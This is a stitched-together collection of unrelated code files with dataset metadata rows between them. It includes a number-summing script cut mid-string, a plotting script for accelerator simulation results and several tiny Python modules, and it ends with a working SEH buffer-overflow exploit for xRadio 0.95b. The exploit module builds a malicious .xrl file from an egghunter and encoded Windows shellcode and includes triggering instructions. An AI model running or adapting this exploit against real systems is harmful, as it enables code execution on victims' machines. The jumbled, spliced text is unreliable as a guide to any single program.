70386486105843025439939619828917593665686757934951
62176457141856560629502157223196586755079324193331
64906352462741904929101432445813822663347944758178
92575867718337217661963751590579239728245598838407
58203565325359399008402633568948830189458628227828
80181199384826282014278194139940567587151170094390
35398664372827112653829987240784473053190104293586
86515506006295864861532075273371959191420517255829
71693888707715466499115593487603532921714970056938
54370070576826684624621495650076471787294438377604
53282654108756828443191190634694037855217779295145
36123272525000296071075082563815656710885258350721
45876576172410976447339110607218265236877223636045
17423706905851860660448207621209813287860733969412
81142660418086830619328460811191061556940512689692
51934325451728388641918047049293215058642563049483
62467221648435076201727918039944693004732956340691
15732444386908125794514089057706229429197107928209
55037687525678773091862540744969844508330393682126
18336384825330154686196124348767681297534375946515
80386287592878490201521685554828717201219257766954
78182833757993103614740356856449095527097864797581
16726320100436897842553539920931837441497806860984
48403098129077791799088218795327364475675590848030
87086987551392711854517078544161852424320693150332
59959406895756536782107074926966537676326235447210
69793950679652694742597709739166693763042633987085
41052684708299085211399427365734116182760315001271
65378607361501080857009149939512557028198746004375
35829035317434717326932123578154982629742552737307
94953759765105305946966067683156574377167401875275
88902802571733229619176668713819931811048770190271
25267680276078003013678680992525463401061632866526
36270218540497705585629946580636237993140746255962
24074486908231174977792365466257246923322810917141
91430288197103288597806669760892938638285025333403
34413065578016127815921815005561868836468420090470
23053081172816430487623791969842487255036638784583
11487696932154902810424020138335124462181441773470
63783299490636259666498587618221225225512486764533
67720186971698544312419572409913959008952310058822
95548255300263520781532296796249481641953868218774
76085327132285723110424803456124867697064507995236
37774242535411291684276865538926205024910326572967
23701913275725675285653248258265463092207058596522
29798860272258331913126375147341994889534765745501
18495701454879288984856827726077713721403798879715
38298203783031473527721580348144513491373226651381
34829543829199918180278916522431027392251122869539
40957953066405232632538044100059654939159879593635
29746152185502371307642255121183693803580388584903
41698116222072977186158236678424689157993532961922
62467957194401269043877107275048102390895523597457
23189706772547915061505504953922979530901129967519
86188088225875314529584099251203829009407770775672
11306739708304724483816533873502340845647058077308
82959174767140363198008187129011875491310547126581
97623331044818386269515456334926366572897563400500
42846280183517070527831839425882145521227251250327
55121603546981200581762165212827652751691296897789
32238195734329339946437501907836945765883352399886
75506164965184775180738168837861091527357929701337
62177842752192623401942399639168044983993173312731
32924185707147349566916674687634660915035914677504
99518671430235219628894890102423325116913619626622
73267460800591547471830798392868535206946944540724
76841822524674417161514036427982273348055556214818
97142617910342598647204516893989422179826088076852
87783646182799346313767754307809363333018982642090
10848802521674670883215120185883543223812876952786
71329612474782464538636993009049310363619763878039
62184073572399794223406235393808339651327408011116
66627891981488087797941876876144230030984490851411
60661826293682836764744779239180335110989069790714
85786944089552990653640447425576083659976645795096
66024396409905389607120198219976047599490197230297
64913982680032973156037120041377903785566085089252
16730939319872750275468906903707539413042652315011
94809377245048795150954100921645863754710598436791
78639167021187492431995700641917969777599028300699
15368713711936614952811305876380278410754449733078
40789923115535562561142322423255033685442488917353
44889911501440648020369068063960672322193204149535
41503128880339536053299340368006977710650566631954
81234880673210146739058568557934581403627822703280
82616570773948327592232845941706525094512325230608
22918802058777319719839450180888072429661980811197
77158542502016545090413245809786882778948721859617
72107838435069186155435662884062257473692284509516
20849603980134001723930671666823555245252804609722
53503534226472524250874054075591789781264330331690"""
numbers = [int(i) for i in numbers.split("\n")]
print(str(sum(numbers))[:10])
| 52.266667 | 80 | 0.845344 | 181 | 6,272 | 29.287293 | 0.872928 | 0.005659 | 0.003018 | 0.003773 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.900661 | 0.107621 | 6,272 | 119 | 81 | 52.705882 | 0.046453 | 0.161352 | 0 | 0 | 0 | 0 | 0.978891 | 0.959509 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.009804 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cbac952b1ce9f7dc2df3b3ff6e80160492f86c5c | 82 | py | Python | hrv/sampledata/__init__.py | rhenanbartels/hrv | 3f813f6727ff693daccf2fd1a939a30a966f56e1 | [
"BSD-3-Clause"
] | 157 | 2016-10-21T00:41:25.000Z | 2022-03-29T01:53:30.000Z | hrv/sampledata/__init__.py | nickzhuang0613/hrv | 190c923250884b1f5632e38658bd8df7d9d5352e | [
"BSD-3-Clause"
] | 23 | 2017-03-26T19:45:21.000Z | 2021-12-16T06:54:08.000Z | hrv/sampledata/__init__.py | nickzhuang0613/hrv | 190c923250884b1f5632e38658bd8df7d9d5352e | [
"BSD-3-Clause"
] | 50 | 2016-10-21T00:23:35.000Z | 2022-03-08T12:01:57.000Z | from hrv.sampledata._load import load_rest_rri, load_exercise_rri, load_noisy_rri
| 41 | 81 | 0.878049 | 14 | 82 | 4.642857 | 0.642857 | 0.215385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.073171 | 82 | 1 | 82 | 82 | 0.855263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cbb297179d0f24e5414590bc1d5c6cbbdcb5406e | 8,355 | py | Python | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | null | null | null | src/plot/plot-bb/plot4_centroids.py | bcrafton/speed_read | 3e9c0c873e49e4948a216aae14ec0d4654d1a62c | [
"MIT"
] | 2 | 2020-11-08T12:51:23.000Z | 2021-12-02T23:16:48.000Z |
import numpy as np
np.set_printoptions(precision=2, suppress=True)
import matplotlib.pyplot as plt
####################
def merge_dicts(list_of_dicts):
results = {}
for d in list_of_dicts:
for key in d.keys():
if key in results.keys():
results[key].append(d[key])
else:
results[key] = [d[key]]
return results
####################
comp_pJ = 22. * 1e-12 / 32. / 16.
num_layers = 6
num_comparator = 8
results = np.load('results.npy', allow_pickle=True).item()
x = np.array([0.06, 0.08, 0.10, 0.12, 0.14, 0.16, 0.18, 0.20])
y_mean = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_std = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac_per_cycle = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac_per_pJ = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_mac = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_cycle = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_ron = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_roff = np.zeros(shape=(2, 2, 2, len(x), num_layers))
y_adc = np.zeros(shape=(2, 2, 2, len(x), num_layers, num_comparator))
y_energy = np.zeros(shape=(2, 2, 2, len(x), num_layers))
####################
for key in sorted(results.keys()):
(skip, cards, alloc, profile, narray, sigma, rpr) = key
layer_results = results[key]
if rpr == 'dynamic':
rpr = 0
elif rpr == 'centroids':
rpr = 1
else:
        assert False
for layer in range(num_layers):
example_results = merge_dicts(layer_results[layer])
sigma_index = np.where(x == sigma)[0][0]
y_mean[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['mean'])
y_std[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['std'])
y_mac_per_cycle[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['nmac']) / np.sum(example_results['cycle'])
y_mac[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['nmac'])
y_cycle[skip][cards][rpr][sigma_index][layer] = np.mean(example_results['cycle'])
y_ron[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['ron'])
y_roff[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['roff'])
y_adc[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['adc'], axis=0)
y_energy[skip][cards][rpr][sigma_index][layer] += y_ron[skip][cards][rpr][sigma_index][layer] * 2e-16
y_energy[skip][cards][rpr][sigma_index][layer] += y_roff[skip][cards][rpr][sigma_index][layer] * 2e-16
y_energy[skip][cards][rpr][sigma_index][layer] += np.sum(y_adc[skip][cards][rpr][sigma_index][layer] * np.array([1,2,3,4,5,6,7,8]) * comp_pJ)
y_mac_per_pJ[skip][cards][rpr][sigma_index][layer] = np.sum(example_results['nmac']) / 1e12 / np.sum(y_energy[skip][cards][rpr][sigma_index][layer])
####################
plot_layer = 0
####################
TOPs_skip = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 0, 0, :, :], axis=1) / 1e12
TOPs_cards = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 1, 0, :, :], axis=1) / 1e12
TOPs_centroids = 2 * 700e6 * np.sum(y_mac_per_cycle[1, 1, 1, :, :], axis=1) / 1e12
####################
MAC_pJ_skip = np.sum(y_mac[1, 0, 0, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 0, 0, :, :], axis=1)
MAC_pJ_cards = np.sum(y_mac[1, 1, 0, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 1, 0, :, :], axis=1)
MAC_pJ_centroids = np.sum(y_mac[1, 1, 1, :, :], axis=1) / 1e12 / np.sum(y_energy[1, 1, 1, :, :], axis=1)
####################
plt.cla()
ax = plt.gca()
# plt.plot(x, y_mac_per_cycle[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, TOPs_skip, color='green', marker="D", markersize=5, label='skip')
plt.plot(x, TOPs_cards, color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, TOPs_centroids, color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.xlabel('Variance')
plt.ylabel('TOPs')
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('TOPs.png', dpi=300)
plt.cla()
ax = plt.gca()
# plt.plot(x, y_mac_per_pJ[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, MAC_pJ_skip, color='green', marker="D", markersize=5, label='skip')
plt.plot(x, MAC_pJ_cards, color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, MAC_pJ_centroids, color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
plt.xlabel('Variance')
plt.ylabel('MAC / pJ')
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('mac_per_pJ.png', dpi=300)
plt.cla()
ax = plt.gca()
# plt.plot(x, y_std[0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='baseline')
# plt.plot(x, y_std[1, 0, 0, :, plot_layer], color='green', marker="D", markersize=5, label='skip')
# plt.plot(x, y_std[1, 1, 0, :, plot_layer], color='blue', marker="s", markersize=6, label='cards')
# plt.plot(x, y_std[1, 1, 1, :, plot_layer], color='black', marker="^", markersize=6, label='k-means')
plt.plot(x, np.mean(y_std[1, 0, 0, :, :], axis=1), color='green', marker="D", markersize=5, label='skip')
plt.plot(x, np.mean(y_std[1, 1, 0, :, :], axis=1), color='blue', marker="s", markersize=6, label='cards')
plt.plot(x, np.mean(y_std[1, 1, 1, :, :], axis=1), color='black', marker="^", markersize=6, label='k-means')
plt.ylim(bottom=0, top=1)
plt.xticks(x)
# plt.xticks([0.08, 0.12])
# plt.yticks([])
plt.xlabel('Variance')
plt.ylabel('Mean Squared Error')
# ax.axes.xaxis.set_ticklabels([])
# ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
# fig.set_size_inches(4., 2.5)
plt.tight_layout()
plt.legend()
fig.savefig('mse.png', dpi=300)
'''
plt.cla()
ax = plt.gca()
plt.plot(x, acc[0, 0, :], color='green', marker="D", markersize=5, label='baseline')
plt.plot(x, acc[1, 0, :], color='blue', marker="s", markersize=5, label='skip')
plt.plot(x, acc[1, 1, :], color='black', marker="^", markersize=6, label='cards')
plt.ylim(bottom=0, top=1)
plt.xticks([0.08, 0.12])
# plt.yticks([])
ax.axes.xaxis.set_ticklabels([])
ax.axes.yaxis.set_ticklabels([])
plt.grid(True, linestyle='dotted')
fig = plt.gcf()
fig.set_size_inches(4., 2.5)
plt.tight_layout()
fig.savefig('acc.png', dpi=300)
'''
####################
# print (y_std[1, 0, :, :])
# print ('------')
# print (y_std[1, 1, :, :])
'''
print ('mac / pJ')
print (np.around(y_mac_per_pJ[1, 1, 1, :, plot_layer] / y_mac_per_pJ[1, 0, 0, :, plot_layer], 3))
print ('mac / cycle')
print (np.around(y_mac_per_cycle[1, 1, 1, :, plot_layer] / y_mac_per_cycle[1, 0, 0, :, plot_layer], 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 0, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(y_mac_per_pJ[1, 1, 1, :, plot_layer] / y_mac_per_pJ[1, 1, 0, :, plot_layer], 3))
print ('mac / cycle')
print (np.around(y_mac_per_cycle[1, 1, 1, :, plot_layer] / y_mac_per_cycle[1, 1, 0, :, plot_layer], 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 1, 0, :, :], 2))
'''
####################
print ('mac / pJ')
print (np.around(MAC_pJ_centroids / MAC_pJ_cards, 3))
print ('mac / cycle')
print (np.around(TOPs_centroids / TOPs_cards, 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 1, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(MAC_pJ_centroids / MAC_pJ_skip, 3))
print ('mac / cycle')
print (np.around(TOPs_centroids / TOPs_skip, 3))
print ('mse')
print (np.around(y_std[1, 1, 1, :, :] / y_std[1, 0, 0, :, :], 2))
print ('----------')
print ('----------')
print ('----------')
print ('mac / pJ')
print (np.around(MAC_pJ_cards / MAC_pJ_skip, 3))
print ('mac / cycle')
print (np.around(TOPs_cards / TOPs_skip, 3))
print ('mse')
print (np.around(y_std[1, 1, 0, :, :] / y_std[1, 0, 0, :, :], 2))
####################
| 32.011494 | 156 | 0.604548 | 1,401 | 8,355 | 3.444682 | 0.102784 | 0.015748 | 0.029838 | 0.056361 | 0.816826 | 0.782843 | 0.769374 | 0.752383 | 0.73104 | 0.682967 | 0 | 0.046855 | 0.141712 | 8,355 | 260 | 157 | 32.134615 | 0.626133 | 0.129743 | 0 | 0.346774 | 0 | 0 | 0.067997 | 0 | 0 | 0 | 0 | 0 | 0.008065 | 1 | 0.008065 | false | 0 | 0.016129 | 0 | 0.032258 | 0.201613 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
cbb5b84b889431f65a5d604bca4e6cc33615f3a6 | 42 | py | Python | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
] | 5 | 2015-03-18T01:19:56.000Z | 2020-10-23T12:44:47.000Z | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
] | null | null | null | modules/sdl2/__init__.py | rave-engine/rave | 0eeb956363f4d7eda92350775d7d386550361273 | [
"BSD-2-Clause"
] | null | null | null | from . import audio, video, input, image
| 14 | 40 | 0.714286 | 6 | 42 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 42 | 2 | 41 | 21 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cbdb070163c31abc19944c853dd7a7b886cc7def | 65 | py | Python | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 3,010 | 2017-01-07T23:43:33.000Z | 2022-03-31T06:02:59.000Z | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,478 | 2017-01-06T01:35:02.000Z | 2022-03-31T23:03:27.000Z | tests/io/file_stdio.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 1,149 | 2017-01-09T00:35:23.000Z | 2022-03-31T21:24:29.000Z | import sys
print(sys.stdin.fileno())
print(sys.stdout.fileno())
| 13 | 26 | 0.738462 | 10 | 65 | 4.8 | 0.6 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 65 | 4 | 27 | 16.25 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
1dca0ecdde1581a92cd7cd5dc97fddfb948f3e20 | 135 | py | Python | include/tclap-1.4.0-rc1/tests/test65.py | SpaceKatt/cpp-cli-poc | 02ffefea2fc6e999fa2b27d08a8b3be6830b1b97 | [
"BSL-1.0"
] | 62 | 2021-09-21T18:58:02.000Z | 2022-03-07T02:17:43.000Z | third_party/tclap-1.4.0-rc1/tests/test65.py | Vertexwahn/FlatlandRT | 37d09fde38b25eff5f802200b43628efbd1e3198 | [
"Apache-2.0"
] | null | null | null | third_party/tclap-1.4.0-rc1/tests/test65.py | Vertexwahn/FlatlandRT | 37d09fde38b25eff5f802200b43628efbd1e3198 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
import simple_test
simple_test.test("test12", ["-v", "1 2 3", "-v", "4 5 6", "-v", "7 8 9", "-v", "-1 0.2 0.4", ])
| 22.5 | 95 | 0.503704 | 28 | 135 | 2.357143 | 0.642857 | 0.30303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0.17037 | 135 | 5 | 96 | 27 | 0.446429 | 0.118519 | 0 | 0 | 0 | 0 | 0.330508 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
1deb1417c7ca3ed6d620b650d652f2268c866570 | 165 | py | Python | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 6 | 2021-05-12T23:18:36.000Z | 2022-03-24T09:22:23.000Z | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 19 | 2021-05-12T16:54:02.000Z | 2022-03-02T14:20:20.000Z | ape_vyper/__init__.py | NotPeopling2day/ape-vyper | 96a22e67728489511865e0c1ee712b3394b133c2 | [
"Apache-2.0"
] | 3 | 2021-05-12T21:01:54.000Z | 2022-01-21T22:21:38.000Z | from ape import plugins
from .compiler import VyperCompiler
@plugins.register(plugins.CompilerPlugin)
def register_compiler():
return (".vy",), VyperCompiler
| 18.333333 | 41 | 0.775758 | 18 | 165 | 7.055556 | 0.611111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.127273 | 165 | 8 | 42 | 20.625 | 0.881944 | 0 | 0 | 0 | 0 | 0 | 0.018182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.4 | 0.2 | 0.8 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
38279ea4cc6f8cd988b5316eb8734529eb594954 | 85 | py | Python | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | null | null | null | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | null | null | null | src/datasets/common/__init__.py | PranavEranki/SSD-Algorithm | 778c8be06ad75c6dfbe98660fb32ef4cacb7ce4a | [
"MIT"
] | 1 | 2020-02-23T00:40:08.000Z | 2020-02-23T00:40:08.000Z |
from .dataset_source import DatasetSource
from .dataset_writer import DatasetWriter
| 21.25 | 41 | 0.870588 | 10 | 85 | 7.2 | 0.7 | 0.305556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105882 | 85 | 3 | 42 | 28.333333 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
382b755d02e0f1bbd5ba82c0fa4e529b27642b1f | 4,251 | py | Python | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | exploit/xRadio.py | NotFoundHacker/KaliExploit | 9a87798938c8f0b7754d0e7ffe20a186b552adc7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
from core import logger
from colorama import Fore, Style
#
# windows/messagebox - 590 bytes
# x86/alpha_upper
#
"""
This module exploits a buffer overflow in xRadio 0.95b. Using the
application to import a specially crafted xrl file, a buffer
overflow occurs allowing arbitrary code execution."""
class Exploit:
config={
}
def show_options(self):
print(Fore.YELLOW+"Options"+Style.RESET_ALL)
print(Fore.YELLOW+"-------"+Style.RESET_ALL)
for key in sorted(self.config.keys()):
print(Fore.YELLOW+key,":",self.get_config(key)+Style.RESET_ALL)
@staticmethod
def show_info():
logger.info("\nThis exploit tries to do a buffer \noverflow to xRadio type run\n to generate file")
def set_config(self, key, value):
if key in self.config.keys():
self.config[key] = value
else:
logger.error("No options")
def get_config(self, key):
return self.config[key]
@staticmethod
def run():
shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54"
"\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31"
"\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54"
"\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b"
"\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52"
"\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50"
"\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c"
"\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a"
"\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50"
"\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51"
"\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43"
"\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b"
"\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c"
"\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c"
"\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43"
"\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c"
"\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d"
"\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c"
"\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51"
"\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37"
"\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b"
"\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30"
"\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52"
"\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a"
"\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58"
"\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47"
"\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b"
"\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43"
"\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56"
"\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b"
"\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52"
"\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54"
"\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c"
"\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51"
"\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50"
"\x55\x43\x38\x41\x41")
junk = "\x41" * 3248
tag = "\x77\x30\x30\x74\x77\x30\x30\x74"
nops = "\x90" * 230
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
nseh = "\xeb\x88\x90\x90"
seh = "\x82\xe2\x47\x00"
junk2 = "\x42" * 884
try:
            with open('b0t.xrl', 'w') as file:
                file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2)
print("[+] b0t.xrl created.")
print("[+] Open xRadio.exe...")
print("[+] and Radios >> Edit List >> Save radio list")
print("[+] Select the *.xrl file, press Yes and boom!!\n")
except:
print("\n[-] Error.. Can't write file to system.\n")
